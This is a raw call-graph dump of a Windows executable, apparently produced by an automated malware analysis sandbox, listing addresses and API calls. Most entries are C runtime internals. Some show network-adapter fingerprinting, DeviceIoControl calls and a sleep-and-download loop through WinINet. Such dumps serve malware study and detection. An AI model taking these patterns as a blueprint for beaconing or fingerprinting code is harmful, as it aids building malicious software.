LCMapStringW 17737->17738 17738->17732 17739 405c7b 17738->17739 17740 405c81 17739->17740 17742 405cc1 17739->17742 17740->17732 17741 405c8f LCMapStringW 17740->17741 17741->17732 17742->17732 17743 405cf9 LCMapStringW 17742->17743 17743->17732 17744 405d11 WideCharToMultiByte 17743->17744 17744->17732 17755 402e82 17746->17755 17749 403018 17750 403021 17749->17750 17751 403026 17749->17751 17794 404bc0 17750->17794 17800 404bf9 17751->17800 17756 402e7f 17755->17756 17758 402e89 17755->17758 17756->17596 17756->17749 17758->17756 17759 402eae 17758->17759 17760 402ebd 17759->17760 17761 402ed2 17759->17761 17762 402ecb 17760->17762 17770 403653 17760->17770 17761->17762 17764 402f11 RtlAllocateHeap 17761->17764 17767 402ef2 17761->17767 17762->17764 17766 402ed0 17762->17766 17765 402f20 17764->17765 17765->17758 17766->17758 17776 403e00 17767->17776 17769 402efd 17769->17764 17769->17765 17771 403685 17770->17771 17772 403724 17771->17772 17775 403733 17771->17775 17783 40395c 17771->17783 17772->17775 17790 403a0d 17772->17790 17775->17762 17782 403e0e 17776->17782 17777 403efa VirtualAlloc 17781 403ecb 17777->17781 17778 403fcf 17779 403b08 5 API calls 17778->17779 17779->17781 17781->17769 17782->17777 17782->17778 17782->17781 17784 40399f HeapAlloc 17783->17784 17785 40396f HeapReAlloc 17783->17785 17787 4039ef 17784->17787 17788 4039c5 VirtualAlloc 17784->17788 17786 40398e 17785->17786 17785->17787 17786->17784 17787->17772 17788->17787 17789 4039df HeapFree 17788->17789 17789->17787 17791 403a1f VirtualAlloc 17790->17791 17793 403a68 17791->17793 17793->17775 17795 404bca 17794->17795 17796 404bf7 17795->17796 17797 404bf9 7 API calls 17795->17797 17796->17751 17798 404be1 17797->17798 17799 404bf9 7 API calls 17798->17799 17799->17796 17803 404c0c 17800->17803 17801 40302f 17801->17596 17802 404d23 17805 404d36 GetStdHandle WriteFile 17802->17805 17803->17801 17803->17802 17804 404c4c 17803->17804 17804->17801 17806 404c58 GetModuleFileNameA 17804->17806 17805->17801 17807 404c70 17806->17807 17809 405857 17807->17809 17810 405864 LoadLibraryA 17809->17810 17813 4058a6 17809->17813 17811 405875 GetProcAddress 17810->17811 17810->17813 17812 40588c GetProcAddress GetProcAddress 17811->17812 17811->17813 17812->17813 17813->17801 17815 403089 17814->17815 17816 40306d 17814->17816 17815->17626 17817 403077 17816->17817 17818 40308d 17816->17818 17820 4030b9 HeapFree 17817->17820 17821 403083 17817->17821 17819 4030b8 17818->17819 17823 4030a7 17818->17823 17819->17820 17820->17815 17825 40332a 17821->17825 17831 403dbb 17823->17831 17826 403368 17825->17826 17830 40361e 17825->17830 17827 403564 VirtualFree 17826->17827 17826->17830 17828 4035c8 17827->17828 17829 4035d7 VirtualFree HeapFree 17828->17829 17828->17830 17829->17830 17830->17815 17832 403dfe 17831->17832 17833 403de8 17831->17833 17832->17815 17833->17832 17835 403ca2 17833->17835 17838 403caf 17835->17838 17836 403d5f 17836->17832 17837 403cd0 VirtualFree 17837->17838 17838->17836 17838->17837 17840 403c4c VirtualFree 17838->17840 17841 403c69 17840->17841 17842 403c99 17841->17842 17843 403c79 HeapFree 17841->17843 17842->17838 17843->17838 17845 405844 17844->17845 17846 40584b 17844->17846 17848 405477 17845->17848 17846->17632 17855 405610 17848->17855 17850 405604 17850->17846 17853 4054ba GetCPInfo 17854 4054ce 17853->17854 17854->17850 17860 4056b6 GetCPInfo 17854->17860 17856 405630 17855->17856 17857 405620 GetOEMCP 17855->17857 17858 405488 17856->17858 17859 405635 GetACP 17856->17859 17857->17856 17858->17850 17858->17853 17858->17854 17859->17858 17861 4056d9 17860->17861 17867 4057a1 17860->17867 17862 405d6e 6 API calls 17861->17862 17863 405755 17862->17863 17864 405b1f 9 API calls 17863->17864 17865 405779 17864->17865 17866 405b1f 9 API calls 17865->17866 17866->17867 17867->17850 17869 404187 GetCurrentProcess TerminateProcess 17868->17869 17870 404198 17868->17870 17869->17870 17871 402ff9 17870->17871 17872 404202 ExitProcess 17870->17872 17871->17665 17873 2a1f823 CreateFileA 17874 2a1f91f 17873->17874 17876 2a1f854 17873->17876 17875 2a1f86c DeviceIoControl 17875->17876 17876->17875 17877 2a1f915 FindCloseChangeNotification 17876->17877 17878 2a1f8e1 GetLastError 17876->17878 17880 2a23acc 17876->17880 17877->17874 17878->17876 17878->17877 17882 2a23ad4 17880->17882 17883 2a23aee 17882->17883 17885 2a23af2 std::exception::exception 17882->17885 17888 2a22f2c 17882->17888 17905 2a28183 RtlDecodePointer 17882->17905 17883->17876 17907 2a244da 17885->17907 17887 2a23b1c 17889 2a22fa7 17888->17889 17894 2a22f38 17888->17894 17890 2a28183 _malloc RtlDecodePointer 17889->17890 17892 2a22fad 17890->17892 17891 2a22f43 17891->17894 17910 2a28653 17891->17910 17919 2a286b0 17891->17919 17954 2a2829c 17891->17954 17895 2a25ddb strtoxl 58 API calls 17892->17895 17894->17891 17897 2a22f6b RtlAllocateHeap 17894->17897 17899 2a22f93 17894->17899 17900 2a28183 _malloc RtlDecodePointer 17894->17900 17903 2a22f91 17894->17903 17896 2a22f9f 17895->17896 17896->17882 17897->17894 17897->17896 17957 2a25ddb 17899->17957 17900->17894 17904 2a25ddb strtoxl 58 API calls 17903->17904 17904->17896 17906 2a28196 17905->17906 17906->17882 17909 2a244f9 RaiseException 17907->17909 17909->17887 17960 2a300fe 17910->17960 17912 2a2865a 17913 2a28667 17912->17913 17914 2a300fe __NMSG_WRITE 59 API calls 17912->17914 17915 2a286b0 __NMSG_WRITE 59 API calls 17913->17915 17918 2a28689 17913->17918 17914->17913 17916 2a2867f 17915->17916 17917 2a286b0 __NMSG_WRITE 59 API calls 17916->17917 17917->17918 17918->17891 17920 2a286ce __NMSG_WRITE 17919->17920 17921 2a300fe __NMSG_WRITE 55 API calls 17920->17921 17953 2a287f5 17920->17953 17923 2a286e1 17921->17923 17922 2a244cb __crtLCMapStringA_stat 6 API calls 17924 2a2885e 17922->17924 17925 2a287fa GetStdHandle 17923->17925 17927 2a300fe __NMSG_WRITE 55 API calls 17923->17927 17924->17891 17926 2a28808 _strlen 17925->17926 17925->17953 17931 2a28841 WriteFile 17926->17931 17926->17953 17928 2a286f2 17927->17928 17928->17925 17929 2a28704 17928->17929 17929->17953 18004 2a2f4bd 17929->18004 17931->17953 17933 2a28862 17935 2a24e85 __invoke_watson 8 API calls 17933->17935 17934 2a28731 GetModuleFileNameW 17936 2a28751 17934->17936 17941 2a28761 __NMSG_WRITE 17934->17941 17938 2a2886c 17935->17938 17937 2a2f4bd __NMSG_WRITE 55 API calls 17936->17937 17937->17941 17939 2a28891 RtlEnterCriticalSection 17938->17939 18056 2a288f5 17938->18056 17939->17891 17940 2a287a7 17940->17933 18022 2a2f451 17940->18022 17941->17933 17941->17940 18013 2a2f532 17941->18013 17944 2a28884 17944->17939 18078 2a283bf 17944->18078 17948 2a2f451 __NMSG_WRITE 55 API calls 17950 2a287de 17948->17950 17950->17933 17951 2a287e5 17950->17951 18031 2a3013e RtlEncodePointer 17951->18031 17953->17922 18141 2a28268 GetModuleHandleExW 17954->18141 18144 2a25bf2 GetLastError 17957->18144 17959 2a25de0 17959->17903 17961 2a30108 17960->17961 17962 2a25ddb strtoxl 59 API calls 17961->17962 17963 2a30112 17961->17963 17964 2a3012e 17962->17964 17963->17912 17967 2a24e75 17964->17967 17970 2a24e4a RtlDecodePointer 17967->17970 17971 2a24e5d 17970->17971 17976 2a24e85 IsProcessorFeaturePresent 17971->17976 17974 2a24e4a strtoxl 8 API calls 17975 2a24e81 17974->17975 17975->17912 17977 2a24e90 17976->17977 17982 2a24d18 17977->17982 17981 2a24e74 17981->17974 17983 2a24d32 __setmbcp_nolock __call_reportfault 17982->17983 17984 2a24d52 IsDebuggerPresent 17983->17984 17990 2a294a8 SetUnhandledExceptionFilter UnhandledExceptionFilter 17984->17990 17987 2a24e16 __call_reportfault 17991 2a244cb 17987->17991 17988 2a24e39 17989 2a29493 GetCurrentProcess TerminateProcess 17988->17989 17989->17981 17990->17987 17992 2a244d3 17991->17992 17993 2a244d5 IsProcessorFeaturePresent 17991->17993 17992->17988 17995 2a2950f 17993->17995 17998 2a294be IsDebuggerPresent 17995->17998 17999 2a294d3 __call_reportfault 17998->17999 18000 2a294a8 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 17999->18000 18001 2a294db __call_reportfault 18000->18001 18002 2a29493 __invoke_watson GetCurrentProcess TerminateProcess 18001->18002 18003 2a294f8 18002->18003 18003->17988 18005 2a2f4d6 18004->18005 18006 2a2f4c8 18004->18006 18007 2a25ddb strtoxl 59 API calls 18005->18007 18006->18005 18011 2a2f4ef 18006->18011 18008 2a2f4e0 18007->18008 18009 2a24e75 strtoxl 9 API calls 18008->18009 18010 2a28724 18009->18010 18010->17933 18010->17934 18011->18010 18012 2a25ddb strtoxl 59 API calls 18011->18012 18012->18008 18016 2a2f540 18013->18016 18014 2a2f544 18015 2a25ddb strtoxl 59 API calls 18014->18015 18017 2a2f549 18014->18017 18021 2a2f574 18015->18021 18016->18014 18016->18017 18019 2a2f583 18016->18019 18017->17940 18018 2a24e75 strtoxl 9 API calls 18018->18017 18019->18017 18020 2a25ddb strtoxl 59 API calls 18019->18020 18020->18021 18021->18018 18023 2a2f46b 18022->18023 18026 2a2f45d 18022->18026 18024 2a25ddb strtoxl 59 API calls 18023->18024 18025 2a2f475 18024->18025 18027 2a24e75 strtoxl 9 API calls 18025->18027 18026->18023 18029 2a2f497 18026->18029 18028 2a287c7 18027->18028 18028->17933 18028->17948 18029->18028 18030 2a25ddb strtoxl 59 API calls 18029->18030 18030->18025 18032 2a30172 ___crtIsPackagedApp 18031->18032 18033 2a30231 IsDebuggerPresent 18032->18033 18034 2a30181 LoadLibraryExW 18032->18034 18037 2a30256 18033->18037 18038 2a3023b 18033->18038 18035 2a30198 GetLastError 18034->18035 18036 2a301be GetProcAddress 18034->18036 18041 2a301a7 LoadLibraryExW 18035->18041 18044 2a3024e 18035->18044 18042 2a301d2 7 API calls 18036->18042 18036->18044 18039 2a30249 18037->18039 18040 2a3025b RtlDecodePointer 18037->18040 18038->18039 18043 2a30242 OutputDebugStringW 18038->18043 18039->18044 18050 2a30282 RtlDecodePointer RtlDecodePointer 18039->18050 18054 2a3029a 18039->18054 18040->18044 18041->18036 18041->18044 18045 2a3021a GetProcAddress RtlEncodePointer 18042->18045 18046 2a3022e 18042->18046 18043->18039 18047 2a244cb __crtLCMapStringA_stat 6 API calls 18044->18047 18045->18046 18046->18033 18051 2a30320 18047->18051 18048 2a302d2 RtlDecodePointer 18049 2a302be RtlDecodePointer 18048->18049 18052 2a302d9 18048->18052 18049->18044 18050->18054 18051->17953 18052->18049 18055 2a302ea RtlDecodePointer 18052->18055 18054->18048 18054->18049 18055->18049 18057 2a28901 __setmbcp 18056->18057 18058 2a28920 18057->18058 18059 2a28653 __FF_MSGBANNER 59 API calls 18057->18059 18067 2a28943 __setmbcp 18058->18067 18085 2a28a34 18058->18085 18061 2a2890f 18059->18061 18062 2a286b0 __NMSG_WRITE 59 API calls 18061->18062 18064 2a28916 18062->18064 18068 2a2829c _malloc 3 API calls 18064->18068 18065 2a2893e 18069 2a25ddb strtoxl 59 API calls 18065->18069 18066 2a2894d 18090 2a2886d 18066->18090 18067->17944 18068->18058 18069->18067 18071 2a28954 18072 2a28961 18071->18072 18073 2a28979 18071->18073 18097 2a2918c 18072->18097 18100 2a22ef4 18073->18100 18076 2a2896d 18106 2a28995 18076->18106 18079 2a28653 __FF_MSGBANNER 59 API calls 18078->18079 18080 2a283c7 18079->18080 18081 2a286b0 __NMSG_WRITE 59 API calls 18080->18081 18082 2a283cf 18081->18082 18111 2a2846e 18082->18111 18087 2a28a42 18085->18087 18086 2a22f2c _malloc 59 API calls 18086->18087 18087->18086 18088 2a28937 18087->18088 18109 2a29485 Sleep 18087->18109 18088->18065 18088->18066 18091 2a28891 RtlEnterCriticalSection 18090->18091 18092 2a2887e 18090->18092 18091->18071 18093 2a288f5 __mtinitlocknum 58 API calls 18092->18093 18094 2a28884 18093->18094 18094->18091 18095 2a283bf __amsg_exit 58 API calls 18094->18095 18096 2a28890 18095->18096 18096->18091 18098 2a291a9 InitializeCriticalSectionAndSpinCount 18097->18098 18099 2a2919c 18097->18099 18098->18076 18099->18076 18101 2a22efd HeapFree 18100->18101 18105 2a22f26 __dosmaperr 18100->18105 18102 2a22f12 18101->18102 18101->18105 18103 2a25ddb strtoxl 57 API calls 18102->18103 18104 2a22f18 GetLastError 18103->18104 18104->18105 18105->18076 18110 2a289d7 RtlLeaveCriticalSection 18106->18110 18108 2a2899c 18108->18067 18109->18087 18110->18108 18114 2a28524 18111->18114 18113 2a283da 18115 2a28530 __setmbcp 18114->18115 18116 2a2886d __lock 52 API calls 18115->18116 18117 2a28537 18116->18117 18118 2a285f0 __cinit 18117->18118 18119 2a28565 RtlDecodePointer 18117->18119 18134 2a2863e 18118->18134 18119->18118 18121 2a2857c RtlDecodePointer 18119->18121 18127 2a2858c 18121->18127 18123 2a2864d __setmbcp 18123->18113 18125 2a28635 18128 2a2863e 18125->18128 18129 2a2829c _malloc 3 API calls 18125->18129 18126 2a28599 RtlEncodePointer 18126->18127 18127->18118 18127->18126 18130 2a285a9 RtlDecodePointer RtlEncodePointer 18127->18130 18131 2a2864b 18128->18131 18139 2a289d7 RtlLeaveCriticalSection 18128->18139 18129->18128 18133 2a285bb RtlDecodePointer RtlDecodePointer 18130->18133 18131->18113 18133->18127 18135 2a28644 18134->18135 18136 2a2861e 18134->18136 18140 2a289d7 RtlLeaveCriticalSection 18135->18140 18136->18123 18138 2a289d7 RtlLeaveCriticalSection 18136->18138 18138->18125 18139->18131 18140->18136 18142 2a28281 GetProcAddress 18141->18142 18143 2a28293 ExitProcess 18141->18143 18142->18143 18158 2a2914b 18144->18158 18146 2a25c07 18147 2a25c55 SetLastError 18146->18147 18161 2a289ec 18146->18161 18147->17959 18151 2a25c2e 18152 2a25c34 18151->18152 18153 2a25c4c 18151->18153 18170 2a25c61 18152->18170 18155 2a22ef4 _free 56 API calls 18153->18155 18157 2a25c52 18155->18157 18156 2a25c3c GetCurrentThreadId 18156->18147 18157->18147 18159 2a29162 TlsGetValue 18158->18159 18160 2a2915e 18158->18160 18159->18146 18160->18146 18162 2a289f3 18161->18162 18164 2a25c1a 18162->18164 18166 2a28a11 18162->18166 18180 2a30438 18162->18180 18164->18147 18167 2a2916a 18164->18167 18166->18162 18166->18164 18188 2a29485 Sleep 18166->18188 18168 2a29180 18167->18168 18169 2a29184 TlsSetValue 18167->18169 18168->18151 18169->18151 18171 2a25c6d __setmbcp 18170->18171 18172 2a2886d __lock 59 API calls 18171->18172 18173 2a25caa 18172->18173 18189 2a25d02 18173->18189 18176 2a2886d __lock 59 API calls 18177 2a25ccb ___addlocaleref 18176->18177 18192 2a25d0b 18177->18192 18179 2a25cf6 __setmbcp 18179->18156 18181 2a30443 18180->18181 18185 2a3045e 18180->18185 18182 2a3044f 18181->18182 18181->18185 18184 2a25ddb strtoxl 58 API calls 18182->18184 18183 2a3046e RtlAllocateHeap 18183->18185 18186 2a30454 18183->18186 18184->18186 18185->18183 18185->18186 18187 2a28183 _malloc RtlDecodePointer 18185->18187 18186->18162 18187->18185 18188->18166 18195 2a289d7 RtlLeaveCriticalSection 18189->18195 18191 2a25cc4 18191->18176 18196 2a289d7 RtlLeaveCriticalSection 18192->18196 18194 2a25d12 18194->18179 18195->18191 18196->18194 18197 2a8d36c 18198 2aad845 WriteFile 18197->18198 18199 40b745 18202 40212f 18199->18202 18203 40b16c VirtualAlloc 18202->18203 18205 2a1f927 LoadLibraryA 18206 2a1f950 GetProcAddress 18205->18206 18207 2a1fa0a 18205->18207 18208 2a1fa03 FreeLibrary 18206->18208 18211 2a1f964 18206->18211 18208->18207 18209 2a1f976 GetAdaptersInfo 18209->18211 18210 2a1f9fe 18210->18208 18211->18209 18211->18210 18212 2a23acc _Allocate 60 API calls 18211->18212 18212->18211 18213 401f27 18214 401f3c 18213->18214 18217 401a1d 18214->18217 18216 401f45 18216->18216 18218 401a2c 18217->18218 18223 401a4f CreateFileA 18218->18223 18222 401a3e 18222->18216 18224 401a35 18223->18224 18226 401a7d 18223->18226 18231 401b4b LoadLibraryA 18224->18231 18225 401a98 DeviceIoControl 18225->18226 18226->18225 18228 401b3a FindCloseChangeNotification 18226->18228 18229 401b0e GetLastError 18226->18229 18240 402cb6 18226->18240 18243 402ca8 18226->18243 18228->18224 18229->18226 18229->18228 18232 401c21 18231->18232 18233 401b6e GetProcAddress 18231->18233 18232->18222 18234 401c18 FreeLibrary 18233->18234 18236 401b85 18233->18236 18234->18232 18235 401b95 GetAdaptersInfo 18235->18236 18236->18235 18237 401c15 18236->18237 18238 402cb6 7 API calls 18236->18238 18239 402ca8 12 API calls 18236->18239 18237->18234 18238->18236 18239->18236 18241 403061 7 API calls 18240->18241 18242 402cbf 18241->18242 18242->18226 18244 402e82 12 API calls 18243->18244 18245 402cb3 18244->18245 18245->18226 18246 2a4ec4e 18247 2a4ebd3 WriteFile 18246->18247 18249 2a6fc38 18247->18249 18250 2a1104d 18255 2a23324 18250->18255 18261 2a23228 18255->18261 18257 2a11057 18258 2a11aa9 InterlockedIncrement 18257->18258 18259 2a11ac5 WSAStartup InterlockedExchange 18258->18259 18260 2a1105c 18258->18260 18259->18260 18262 2a23234 __setmbcp 18261->18262 18269 2a28512 18262->18269 18268 2a2325b __setmbcp 18268->18257 18270 2a2886d __lock 59 API calls 18269->18270 18271 2a2323d 18270->18271 18272 2a2326c RtlDecodePointer RtlDecodePointer 18271->18272 18273 2a23249 18272->18273 18274 2a23299 18272->18274 18283 2a23266 18273->18283 18274->18273 18286 2a290dd 18274->18286 18276 2a232fc RtlEncodePointer RtlEncodePointer 18276->18273 18277 2a232ab 18277->18276 18278 2a232d0 18277->18278 18293 2a28a7b 18277->18293 18278->18273 18280 2a28a7b __realloc_crt 62 API calls 18278->18280 18281 2a232ea RtlEncodePointer 18278->18281 18282 2a232e4 18280->18282 18281->18276 18282->18273 18282->18281 18320 2a2851b 18283->18320 18287 2a290e6 18286->18287 18288 2a290fb RtlSizeHeap 18286->18288 18289 2a25ddb strtoxl 59 API calls 18287->18289 18288->18277 18290 2a290eb 18289->18290 18291 2a24e75 strtoxl 9 API calls 18290->18291 18292 2a290f6 18291->18292 18292->18277 18295 2a28a82 18293->18295 18296 2a28abf 18295->18296 18298 2a30324 18295->18298 18319 2a29485 Sleep 18295->18319 18296->18278 18299 2a30338 18298->18299 18300 2a3032d 18298->18300 18302 2a30340 18299->18302 18310 2a3034d 18299->18310 18301 2a22f2c _malloc 59 API calls 18300->18301 18303 2a30335 18301->18303 18304 2a22ef4 _free 59 API calls 18302->18304 18303->18295 18318 2a30348 __dosmaperr 18304->18318 18305 2a30385 18306 2a28183 _malloc RtlDecodePointer 18305->18306 18308 2a3038b 18306->18308 18307 2a30355 RtlReAllocateHeap 18307->18310 18307->18318 18311 2a25ddb strtoxl 59 API calls 18308->18311 18309 2a303b5 18313 2a25ddb strtoxl 59 API calls 18309->18313 18310->18305 18310->18307 18310->18309 18312 2a28183 _malloc RtlDecodePointer 18310->18312 18315 2a3039d 18310->18315 18311->18318 18312->18310 18314 2a303ba GetLastError 18313->18314 18314->18318 18316 2a25ddb strtoxl 59 API calls 18315->18316 18317 2a303a2 GetLastError 18316->18317 18317->18318 18318->18295 18319->18295 18323 2a289d7 RtlLeaveCriticalSection 18320->18323 18322 2a2326b 18322->18268 18323->18322 18324 2a17bd4 18325 2a17be5 18324->18325 18359 2a16745 __setmbcp_nolock 18324->18359 18326 2a22ef4 59 API calls _free 18326->18359 18328 2a16759 Sleep 18329 2a1675f RtlEnterCriticalSection RtlLeaveCriticalSection 18328->18329 18329->18359 18330 2a172fc InternetOpenA 18331 2a1731a InternetSetOptionA InternetSetOptionA InternetSetOptionA 18330->18331 18330->18359 18336 2a17393 __setmbcp_nolock 18331->18336 18332 2a17373 InternetOpenUrlA 18333 2a173d3 InternetCloseHandle 18332->18333 18332->18336 18333->18359 18334 2a17397 InternetReadFile 18335 2a173c8 InternetCloseHandle 18334->18335 18334->18336 18335->18333 18336->18332 18336->18334 18337 2a1743a RtlEnterCriticalSection RtlLeaveCriticalSection 18368 2a222bc 18337->18368 18339 2a222bc 66 API calls 18339->18359 18340 2a22f2c _malloc 59 API calls 18341 2a174ee RtlEnterCriticalSection RtlLeaveCriticalSection 18340->18341 18341->18359 18342 2a177bb RtlEnterCriticalSection RtlLeaveCriticalSection 18342->18359 18345 2a17933 RtlEnterCriticalSection 18346 2a17960 RtlLeaveCriticalSection 18345->18346 18345->18359 18439 2a13c67 18346->18439 18348 2a22f2c 59 API calls _malloc 18348->18359 18352 2a23acc _Allocate 60 API calls 18352->18359 18358 2a23566 60 API calls _strtok 18358->18359 18359->18326 18359->18328 18359->18329 18359->18330 18359->18337 18359->18339 18359->18340 18359->18342 18359->18345 18359->18346 18359->18348 18359->18352 18359->18358 18359->18359 18360 2a1a6a5 73 API calls 18359->18360 18364 2a1773d Sleep 18359->18364 18366 2a17738 shared_ptr 18359->18366 18378 2a1a7cf 18359->18378 18382 2a151ab 18359->18382 18411 2a1ab8f 18359->18411 18421 2a22398 18359->18421 18430 2a11ba7 18359->18430 18446 2a13d7e 18359->18446 18453 2a182bb 18359->18453 18459 2a1d097 18359->18459 18464 2a1836a 18359->18464 18472 2a133b2 18359->18472 18479 2a227d0 18359->18479 18482 2a196b7 18359->18482 18497 2a18f83 18359->18497 18504 2a153df 18359->18504 18360->18359 18489 2a21870 18364->18489 18366->18359 18366->18364 18493 2a14100 18366->18493 18369 2a222eb 18368->18369 18370 2a222c8 18368->18370 18514 2a22303 18369->18514 18370->18369 18372 2a222ce 18370->18372 18374 2a25ddb strtoxl 59 API calls 18372->18374 18373 2a222fe 18373->18359 18375 2a222d3 18374->18375 18376 2a24e75 strtoxl 9 API calls 18375->18376 18377 2a222de 18376->18377 18377->18359 18379 2a1a7d9 __EH_prolog 18378->18379 18822 2a1df80 18379->18822 18381 2a1a7f7 shared_ptr 18381->18359 18383 2a151b5 __EH_prolog 18382->18383 18826 2a20a90 18383->18826 18386 2a13c67 72 API calls 18387 2a151dc 18386->18387 18388 2a13d7e 64 API calls 18387->18388 18389 2a151ea 18388->18389 18390 2a182bb 89 API calls 18389->18390 18391 2a151fe 18390->18391 18392 2a153b4 shared_ptr 18391->18392 18830 2a1a6a5 18391->18830 18392->18359 18395 2a15256 18397 2a1a6a5 73 API calls 18395->18397 18396 2a15288 18398 2a1a6a5 73 API calls 18396->18398 18400 2a15266 18397->18400 18399 2a15299 18398->18399 18399->18392 18401 2a1a6a5 73 API calls 18399->18401 18400->18392 18403 2a1a6a5 73 API calls 18400->18403 18402 2a152dc 18401->18402 18402->18392 18405 2a1a6a5 73 API calls 18402->18405 18404 2a15346 18403->18404 18404->18392 18406 2a1a6a5 73 API calls 18404->18406 18405->18400 18407 2a1536c 18406->18407 18407->18392 18408 2a1a6a5 73 API calls 18407->18408 18409 2a15396 18408->18409 18835 2a1ce59 18409->18835 18412 2a1ab99 __EH_prolog 18411->18412 18886 2a1d06e 18412->18886 18414 2a1abba shared_ptr 18889 2a22070 18414->18889 18416 2a1abd1 18417 2a1abe7 18416->18417 18895 2a13fb0 18416->18895 18417->18359 18422 2a223b4 18421->18422 18423 2a223c9 18421->18423 18424 2a25ddb strtoxl 59 API calls 18422->18424 18423->18422 18427 2a223d0 18423->18427 18425 2a223b9 18424->18425 18426 2a24e75 strtoxl 9 API calls 18425->18426 18428 2a223c4 18426->18428 18427->18428 19386 2a25e81 18427->19386 18428->18359 19587 2a35370 18430->19587 18432 2a11bb1 RtlEnterCriticalSection 18433 2a11be9 RtlLeaveCriticalSection 18432->18433 18435 2a11bd1 18432->18435 19588 2a1e2b0 18433->19588 18435->18433 18436 2a11c55 RtlLeaveCriticalSection 18435->18436 18436->18359 18437 2a11c22 18437->18436 18440 2a20a90 Mailbox 68 API calls 18439->18440 18441 2a13c7e 18440->18441 19670 2a13ca2 18441->19670 18447 2a13d99 htons 18446->18447 18448 2a13dcb htons 18446->18448 19697 2a13bd3 18447->19697 19703 2a13c16 18448->19703 18452 2a13ded 18452->18359 18454 2a182d3 18453->18454 18457 2a182f4 18453->18457 19734 2a1957d 18454->19734 18458 2a18319 18457->18458 19737 2a12ac7 18457->19737 18458->18359 18460 2a20a90 Mailbox 68 API calls 18459->18460 18462 2a1d0ad 18460->18462 18461 2a1d19b 18461->18359 18462->18461 18463 2a12db5 73 API calls 18462->18463 18463->18462 18465 2a18385 WSASetLastError shutdown 18464->18465 18466 2a18375 18464->18466 18468 2a1a489 69 API calls 18465->18468 18467 2a20a90 Mailbox 68 API calls 18466->18467 18469 2a1837a 18467->18469 18470 2a183a2 18468->18470 18469->18359 18470->18469 18471 2a20a90 Mailbox 68 API calls 18470->18471 18471->18469 18473 2a133e1 18472->18473 18474 2a133c4 InterlockedCompareExchange 18472->18474 18476 2a129ee 76 API calls 18473->18476 18474->18473 18475 2a133d6 18474->18475 19831 2a132ab 18475->19831 18478 2a133f1 18476->18478 18478->18359 19884 2a227ee 18479->19884 18481 2a227e9 18481->18359 18483 2a196c1 __EH_prolog 18482->18483 18484 2a11ba7 210 API calls 18483->18484 18485 2a19716 18484->18485 18486 2a19733 RtlEnterCriticalSection 18485->18486 18487 2a19751 RtlLeaveCriticalSection 18486->18487 18488 2a1974e 18486->18488 18487->18359 18488->18487 18490 2a218a1 18489->18490 18491 2a2187d 18489->18491 18490->18366 18491->18490 18492 2a21891 GetProcessHeap HeapFree 18491->18492 18492->18490 18494 2a14112 18493->18494 18495 2a14118 18493->18495 19890 2a1a683 18494->19890 18495->18366 18498 2a18f8d __EH_prolog 18497->18498 19892 2a1373f 18498->19892 18500 2a18fa7 RtlEnterCriticalSection 18501 2a18fb6 RtlLeaveCriticalSection 18500->18501 18503 2a18ff0 18501->18503 18503->18359 18505 2a22f2c _malloc 59 API calls 18504->18505 18506 2a153f4 SHGetSpecialFolderPathA 18505->18506 18507 2a1540a 18506->18507 18507->18507 19901 2a236f1 18507->19901 18510 2a15474 18510->18359 18512 2a1546e 19917 2a23a04 18512->19917 18524 2a221fb 18514->18524 18517 2a22325 18518 2a25ddb strtoxl 59 API calls 18517->18518 18519 2a2232a 18518->18519 18520 2a24e75 strtoxl 9 API calls 18519->18520 18521 2a22335 ___ascii_stricmp 18520->18521 18521->18373 18522 2a258fa 66 API calls __tolower_l 18523 2a2233c 18522->18523 18523->18521 18523->18522 18525 2a2220c 18524->18525 18531 2a22259 18524->18531 18532 2a25bda 18525->18532 18528 2a22239 18528->18531 18552 2a254c1 18528->18552 18531->18517 18531->18523 18533 2a25bf2 __getptd_noexit 59 API calls 18532->18533 18534 2a25be0 18533->18534 18535 2a283bf __amsg_exit 59 API calls 18534->18535 18536 2a22212 18534->18536 18535->18536 18536->18528 18537 2a2513f 18536->18537 18538 2a2514b __setmbcp 18537->18538 18539 2a25bda __setmbcp 59 API calls 18538->18539 18540 2a25154 18539->18540 18541 2a25183 18540->18541 18542 2a25167 18540->18542 18543 2a2886d __lock 59 API calls 18541->18543 18544 2a25bda __setmbcp 59 API calls 18542->18544 18545 2a2518a 18543->18545 18546 2a2516c 18544->18546 18564 2a251bf 18545->18564 18550 2a2517a __setmbcp 18546->18550 18551 2a283bf __amsg_exit 59 API calls 18546->18551 18550->18528 18551->18550 18553 2a254cd __setmbcp 18552->18553 18554 2a25bda __setmbcp 59 API calls 18553->18554 18555 2a254d7 18554->18555 18556 2a2886d __lock 59 API calls 18555->18556 18561 2a254e9 18555->18561 18562 2a25507 18556->18562 18557 2a25534 18818 2a2555e 18557->18818 18558 2a283bf __amsg_exit 59 API calls 18560 2a254f7 __setmbcp 18558->18560 18560->18531 18561->18558 18561->18560 18562->18557 18563 2a22ef4 _free 59 API calls 18562->18563 18563->18557 18565 2a251ca ___addlocaleref ___removelocaleref 18564->18565 18567 2a2519e 18564->18567 18565->18567 18571 2a24f45 18565->18571 18568 2a251b6 18567->18568 18817 2a289d7 RtlLeaveCriticalSection 18568->18817 18570 2a251bd 18570->18546 18572 2a24fbe 18571->18572 18574 2a24f5a 18571->18574 18573 2a2500b 18572->18573 18575 2a22ef4 _free 59 API calls 18572->18575 18580 2a25034 18573->18580 18641 2a2d4bd 18573->18641 18574->18572 18582 2a22ef4 _free 59 API calls 18574->18582 18584 2a24f8b 18574->18584 18577 2a24fdf 18575->18577 18579 2a22ef4 _free 59 API calls 18577->18579 18585 2a24ff2 18579->18585 18583 2a25093 18580->18583 18599 2a22ef4 59 API calls _free 18580->18599 18581 2a22ef4 _free 59 API calls 18581->18580 18588 2a24f80 18582->18588 18589 2a22ef4 _free 59 API calls 18583->18589 18590 2a22ef4 _free 59 API calls 18584->18590 18600 2a24fa9 18584->18600 18591 2a22ef4 _free 59 API calls 18585->18591 18586 2a22ef4 _free 59 API calls 18587 2a24fb3 18586->18587 18592 2a22ef4 _free 59 API calls 18587->18592 18601 2a2d35a 18588->18601 18594 2a25099 18589->18594 18595 2a24f9e 18590->18595 18596 2a25000 18591->18596 18592->18572 18594->18567 18629 2a2d456 18595->18629 18598 2a22ef4 _free 59 API calls 18596->18598 18598->18573 18599->18580 18600->18586 18602 2a2d369 18601->18602 18628 2a2d452 18601->18628 18603 2a22ef4 _free 59 API calls 18602->18603 18604 2a2d37a 18602->18604 18603->18604 18605 2a2d38c 18604->18605 18607 2a22ef4 _free 59 API calls 18604->18607 18606 2a2d39e 18605->18606 18608 2a22ef4 _free 59 API calls 18605->18608 18609 2a2d3b0 18606->18609 18610 2a22ef4 _free 59 API calls 18606->18610 